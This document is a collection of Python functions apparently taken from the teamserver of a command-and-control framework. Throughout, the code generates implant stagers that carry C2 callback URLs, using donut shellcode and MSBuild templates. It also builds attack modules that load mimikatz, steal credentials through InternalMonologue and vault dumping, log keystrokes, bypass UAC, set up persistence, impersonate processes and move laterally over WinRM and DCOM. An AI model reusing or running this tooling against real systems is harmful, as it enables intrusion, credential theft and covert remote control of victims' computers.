def payload(self): listener = ipc_server.publish_event( Events.GET_LISTENERS, (self.options['Listener']['Value'], )) if listener: c2_urls = ','.join( filter(None, [ f"{listener.name}://{listener['BindIP']}:{listener['Port']}", listener['CallBackURls'] ])) guid = uuid.uuid4() psk = gen_stager_psk() ipc_server.publish_event(Events.SESSION_REGISTER, (guid, psk)) donut_shellcode = donut.create( file=get_path_in_package('core/teamserver/data/naga.exe'), params=f"{guid};{psk};{c2_urls}", arch=2 if self.options['Architecture']['Value'] == 'x64' else 1) shellcode = shellcode_to_hex_byte_array(donut_shellcode) with open( get_path_in_package( 'core/teamserver/modules/boo/src/excel4dcom.boo') ) as module_src: src = module_src.read() src = src.replace('SHELLCODE', shellcode) src = src.replace('TARGET', self.options['Target']['Value']) src = src.replace('ARCH', self.options['Architecture']['Value']) return src else: print_bad( f"Listener '{self.options['Listener']['Value']}' not found!")
def generate(self, listener): with open(get_path_in_package('core/teamserver/data/naga.exe'), 'rb') as assembly: with open( get_path_in_package( 'core/teamserver/stagers/templates/msbuild.xml') ) as template: guid = uuid.uuid4() psk = gen_stager_psk() c2_urls = ','.join( filter(None, [ f"{listener.name}://{listener['BindIP']}:{listener['Port']}", listener['CallBackURls'] ])) template = template.read() template = template.replace('GUID', str(guid)) template = template.replace('PSK', psk) template = template.replace('URLS', c2_urls) template = template.replace("NAME_GOES_HERE", gen_random_string_no_digits(5)) template = template.replace( "BASE64_ENCODED_ASSEMBLY", dotnet_deflate_and_encode(assembly.read())) return guid, psk, template
def gen_encrypted_stage(self, comms): stage = gen_stager_code(comms) stage_file = BytesIO() with open(get_path_in_package('core/teamserver/data/Boo.Lang.dll'), 'rb') as boolangdll: with open( get_path_in_package( 'core/teamserver/data/Boo.Lang.Compiler.dll'), 'rb') as boolangcompilerdll: with open( get_path_in_package( 'core/teamserver/data/Boo.Lang.Parser.dll'), 'rb') as boolangparserdll: with open( get_path_in_package( 'core/teamserver/data/Boo.Lang.Extensions.dll' ), 'rb') as boolangextensionsdll: with ZipFile(stage_file, 'a', compression=ZIP_DEFLATED, compresslevel=9) as zip_file: zip_file.writestr("Boo.Lang.dll", boolangdll.read()) zip_file.writestr("Boo.Lang.Compiler.dll", boolangcompilerdll.read()) zip_file.writestr("Boo.Lang.Parser.dll", boolangparserdll.read()) zip_file.writestr("Boo.Lang.Extensions.dll", boolangextensionsdll.read()) zip_file.writestr("Main.boo", stage) return self.crypto.encrypt(stage_file.getvalue())
def payload(self): with open( get_path_in_package('core/teamserver/data/powerkatz_x86.dll'), 'rb') as powerkatz_x86: with open( get_path_in_package( 'core/teamserver/data/powerkatz_x64.dll'), 'rb') as powerkatz_x64: with open( get_path_in_package( 'core/teamserver/data/mimikatz_peloader.dll'), 'rb') as peloader: with open( get_path_in_package( 'core/teamserver/modules/boo/src/mimikatz.boo') ) as module_src: src = module_src.read() src = src.replace( "COMPRESSED_PE_x86", dotnet_deflate_and_encode(powerkatz_x86.read())) src = src.replace( "COMPRESSED_PE_x64", dotnet_deflate_and_encode(powerkatz_x64.read())) src = src.replace( "MIMI_PE_LOADER", dotnet_deflate_and_encode(peloader.read())) src = src.replace("MIMIKATZ_COMMAND", self.options['Command']['Value']) return src
def generate(self, listener): with open(get_path_in_package('core/teamserver/data/naga.exe'), 'rb') as assembly: guid = uuid.uuid4() psk = gen_stager_psk() c2_urls = ','.join( filter(None, [ f"{listener.name}://{listener['BindIP']}:{listener['Port']}", listener['CallBackURls'] ])) arch = 3 # User can specify 64-bit or 32-bit if self.options['Architecture']['Value'] == 'x64': arch = 2 elif self.options['Architecture']['Value'] == 'x86': arch = 1 donut_shellcode = donut.create( file=get_path_in_package('core/teamserver/data/naga.exe'), params=f"{guid};{psk};{c2_urls}", arch=arch) shellcode = shellcode_to_hex_string(donut_shellcode) return guid, psk, shellcode
def payload(self): with open( get_path_in_package( 'core/teamserver/data/internalmonologue.dll'), 'rb') as dll: with open( get_path_in_package( 'core/teamserver/modules/boo/src/internalmonologue.boo' )) as module_src: src = module_src.read() src = src.replace("INTERNAL_MONOLOGUE_DLL", dotnet_deflate_and_encode(dll.read())) src = src.replace( "impersonate=", f"impersonate={self.options['Impersonate']['Value']}". lower()) src = src.replace( "threads=", f"threads={self.options['Threads']['Value']}".lower()) src = src.replace( "downgrade=", f"downgrade={self.options['Downgrade']['Value']}".lower()) src = src.replace( "restore=", f"restore={self.options['Restore']['Value']}".lower()) src = src.replace( "challenge=", f"challenge=\"{self.options['Challenge']['Value']}\"". lower()) src = src.replace( "verbose=", f"verbose={self.options['Verbose']['Value']}".lower()) return src
def payload(self): with open( get_path_in_package( 'core/teamserver/modules/boo/src/unattendedinstallfiles.boo' ), 'r') as module_src: src = module_src.read() return src
def payload(self): with open( get_path_in_package( 'core/teamserver/modules/boo/src/execute-assembly.boo') ) as module: module = module.read() assembly_path = os.path.expanduser( self.options['Assembly']['Value']) if not os.path.exists(assembly_path): raise Exception("Assembly not found in specified path") assembly_size = os.path.getsize(assembly_path) with open(assembly_path, 'rb') as assembly: module = module.replace( "B64_ENCODED_COMPRESSED_ASSEMBLY", dotnet_deflate_and_encode(assembly.read())) module = module.replace("DECOMPRESSED_ASSEMBLY_LENGTH", str(assembly_size)) boolang_string_array = '' if self.options['Arguments']['Value']: formatted_arguments = r', '.join([ fr"`{arg}`" for arg in split(self.options['Arguments']['Value']) ]) boolang_string_array = f"= array(string, ({formatted_arguments}))" module = module.replace("ASSEMBLY_ARGS", boolang_string_array) print(module) return module
def payload(self): with open( get_path_in_package( 'core/teamserver/modules/boo/src/domainusers.boo'), 'r') as module_src: src = module_src.read() src = src.replace("IDENTITY", self.options['Identity']['Value']) src = src.replace("LDAP_FILTER", self.options['LDAPFilter']['Value']) src = src.replace("PROPERTIES", self.options['Properties']['Value'].lower()) src = src.replace("UAC_FILTER", self.options['UACFilter']['Value']) src = src.replace('SPN', str(self.options['SPN']['Value']).lower()) src = src.replace( 'DO_ALLOW_DELEGATION', str(self.options['DoAllowDelegation']['Value']).lower()) src = src.replace( 'DISALLOW_DELEGATION', str(self.options['DisallowDelegation']['Value']).lower()) src = src.replace('ADMINCOUNT', str(self.options['AdminCount']['Value']).lower()) src = src.replace( 'TRUSTED_TO_AUTH', str(self.options['TrustedToAuth']['Value']).lower()) src = src.replace( 'PREAUTH_NOT_REQUIRED', str(self.options['PreauthNotRequired']['Value']).lower()) src = src.replace('FIND_ONE', str(self.options['FindOne']['Value']).lower()) return src
def payload(self): with open( get_path_in_package( 'core/teamserver/modules/boo/src/domaincomputers.boo'), 'r') as module_src: src = module_src.read() src = src.replace("IDENTITY", self.options['Identity']['Value']) src = src.replace("LDAP_FILTER", self.options['LDAPFilter']['Value']) src = src.replace("PROPERTIES", self.options['Properties']['Value'].lower()) src = src.replace("UAC_FILTER", self.options['UACFilter']['Value']) src = src.replace( 'UNCONSTRAINED', str(self.options['Unconstrained']['Value']).lower()) src = src.replace( 'TRUSTED_TO_AUTH', str(self.options['TrustedToAuth']['Value']).lower()) src = src.replace('PRINTERS', str(self.options['Printers']['Value']).lower()) src = src.replace('SPN', str(self.options['SPN']['Value']).lower()) src = src.replace('OPERATING_SYSTEM', self.options['OperatingSystem']['Value']) src = src.replace('SERVICE_PACK', self.options['ServicePack']['Value']) src = src.replace('SITE_NAME', self.options['SiteName']['Value']) src = src.replace('FIND_ONE', str(self.options['FindOne']['Value']).lower()) return src
def payload(self): with open( get_path_in_package( 'core/teamserver/modules/boo/src/rick-astley.boo'), 'r') as module_src: src = module_src.read() return src
def payload(self): with open( get_path_in_package( 'core/teamserver/modules/boo/src/alwaysinstallelevated.boo' ), 'r') as module_src: src = module_src.read() return src
def payload(self): with open( get_path_in_package( 'core/teamserver/modules/boo/src/mcafeesitelistfiles.boo'), 'r') as module_src: src = module_src.read() return src
def payload(self): with open(get_path_in_package('core/teamserver/modules/boo/src/getregistrykey.boo'), 'r') as module_src: src = module_src.read() src = src.replace('REGISTRY_HIVE', str(self.options['RegistryHive']['Value']).upper()) src = src.replace('REGISTRY_KEY', self.options['RegistryKey']['Value']) src = src.replace('REGISTRY_VALUE', self.options['RegistryValue']['Value']) return src
def __init__(self, teamserver): self.teamserver = teamserver self.modules = [] self.selected = None super().__init__( type="module", paths=[get_path_in_package("core/teamserver/modules/boo/")])
def payload(self): with open( get_path_in_package( 'core/teamserver/modules/boo/src/dumpVaultCredentials.boo') ) as module_src: src = module_src.read() return src
def __init__(self, teamserver): self.teamserver = teamserver self.listeners = [] self.selected = None ipc_server.attach(Events.GET_LISTENERS, self._get_listeners) super().__init__(type="listener", paths=[get_path_in_package("core/teamserver/listeners/")])
def payload(self): with open( get_path_in_package( 'core/teamserver/modules/boo/src/modifiableservices.boo'), 'r') as module_src: src = module_src.read() return src
def get_comms(comms): comms_section = StringIO() comm_classes = [] for channel in comms: for comm_file in os.listdir( get_path_in_package("core/teamserver/comms/")): if comm_file.endswith('.boo') and channel.strip().lower( ) == comm_file[:-4].lower(): comm_classes.append(f"{channel.strip().upper()}()") with open( os.path.join( get_path_in_package("core/teamserver/comms/"), comm_file)) as channel_code: comms_section.write(channel_code.read()) return ", ".join(comm_classes), comms_section.getvalue()
def payload(self): with open(get_path_in_package('core/teamserver/modules/boo/src/bypassUACfodhelper.boo'), 'r') as module_src: src = module_src.read() src = src.replace('BINARY', str(self.options['Binary']['Value'])) src = src.replace('ARGUMENTS', str(self.options['Arguments']['Value'])) src = src.replace('PATH', str(self.options['Path']['Value'])) return src
def generate(self, listener): with open(get_path_in_package('core/teamserver/data/naga.exe'), 'rb') as exe: guid = uuid.uuid4() psk = gen_stager_psk() return guid, psk, exe.read().decode('latin-1')
def payload(self): stager = ipc_server.publish_event(Events.GET_STAGERS, (self.options['Stager']['Value'], )) listener = ipc_server.publish_event( Events.GET_LISTENERS, (self.options['Listener']['Value'], )) if stager and listener: if self.options['Stager']['Value'] == 'powershell': stager.options['AsFunction']['Value'] = False with open( get_path_in_package( 'core/teamserver/modules/boo/src/winrm.boo'), 'r') as module_src: guid, psk, stage = stager.generate(listener) ipc_server.publish_event(Events.SESSION_REGISTER, (guid, psk)) src = module_src.read() src = src.replace('TARGET', self.options['Host']['Value']) src = src.replace('USERNAME', self.options['Username']['Value']) src = src.replace('DOMAIN', self.options['Domain']['Value']) src = src.replace('PASSWORD', self.options['Password']['Value']) src = src.replace( 'TRUSTED_HOSTS', str(self.options['AddToTrustedHosts']['Value']).lower()) src = src.replace('PAYLOAD', stage) return src print_bad('Invalid stager/listener selected')
def payload(self): with open( get_path_in_package('core/teamserver/modules/boo/src/ls.boo'), 'r') as module_src: src = module_src.read() src = src.replace('PATH', self.options['Path']['Value']) return src
def payload(self): with open( get_path_in_package( 'core/teamserver/modules/boo/src/rdp.boo')) as module_src: src = module_src.read() src = src.replace('status', self.options['RDP_Status']['Value']) return src
def payload(self): with open( get_path_in_package( 'core/teamserver/modules/boo/src/mouseshaker.boo'), 'r') as module_src: src = module_src.read() src = src.replace('OFFSET', str(self.options['Offset']['Value'])) return src
def payload(self): with open( get_path_in_package( 'core/teamserver/modules/boo/src/keylogger.boo'), 'r') as module_src: src = module_src.read() src = src.replace('MINUTES', self.options['Duration']['Value']) return src
def payload(self): with open(get_path_in_package('core/teamserver/modules/boo/src/startupfolderpersistence.boo'), 'r') as module_src: src = module_src.read() src = src.replace('COMMAND', self.options['Command']['Value']) src = src.replace('ARGUMENTS', self.options['Arguments']['Value']) src = src.replace('FILENAME', self.options['FileName']['Value']) src = src.replace('STATUS', str(self.options['Status']['Value']).lower()) return src
def payload(self): with open( get_path_in_package( 'core/teamserver/modules/boo/src/bypassUACEventVwr.boo'), 'r') as module_src: src = module_src.read() src = src.replace('PAYLOAD', str(self.options['Command']['Value'])) return src
def payload(self): with open( get_path_in_package( 'core/teamserver/modules/boo/src/impersonateprocess.boo'), 'r') as module_src: src = module_src.read() src = src.replace('PROCESS_ID', self.options['ProcessID']['Value']) return src
def __init__(self, teamserver): self.teamserver = teamserver self.selected = None ipc_server.attach(Events.GET_STAGERS, self._get_stagers) super().__init__( type="stager", paths=[get_path_in_package("core/teamserver/stagers/")])